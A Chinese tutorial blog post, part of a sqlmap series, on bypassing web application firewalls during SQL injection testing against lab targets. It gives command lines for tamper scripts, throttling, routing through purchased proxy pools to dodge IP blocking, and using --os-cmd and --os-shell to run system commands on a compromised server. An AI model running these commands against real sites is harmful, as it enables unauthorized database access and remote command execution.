SQLMAP使用教程(四)实战技巧三之绕过防火墙

目前很多网站都使用waf对网站进行保护,在渗透测试过程中,很多的操作都会被拦截,在测试SQL注入时,waf会对请求过来的流量进行拦截,
导致SQLMAP请求的内容无法到达目标,SQLMAP无法判断目标是否存在注入,waf对恶意的攻击请求进行拦截,拦截会拉入黑名单,导致攻击者
访问不到目标。无法进行安全检测。

一、查看temper模块

sqlmap --list-tamper

在这里插入图片描述

二、宽字节注入

sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

三、设置线程大小

在遇到waf的时候,如果并发过大,会认为是cc攻击,ip会被封堵。

--threads=1 设置线程为1

四、设置http请求延时

--delay=DELAY 设置每个 HTTP请求的延迟秒数。

五、使用代理注入

sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1  --proxy=http://192.168.1.107:4455

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

六、使用代理池注入

购买代理池之后,获取代理保存到文件内,比如:proxy.txt

123.73.208.166:46603
123.73.63.29:46603
123.73.63.84:46603
112.123.40.42:40806
183.47.94.248:38090
121.237.149.88:13804
114.99.108.71:23359
123.73.209.246:46603
123.73.63.132:46603
119.55.253.202:39730
--proxy-file 从文件中加载代理列表。
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt

七、sqlmap命令执行

--os-cmd=OSCMD      执行操作系统命令
--os-shell          调出交互式操作系统 shell
注入点的当前用户是dba时,使用以上两个命令,一个是执行命令,一个是调用交互操作系统shell

1、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"

2、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
使用--os-shell命令会弹出一个交互shell的界面,可以输入命令,如果可以回显就会返回命令执行的信息。
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值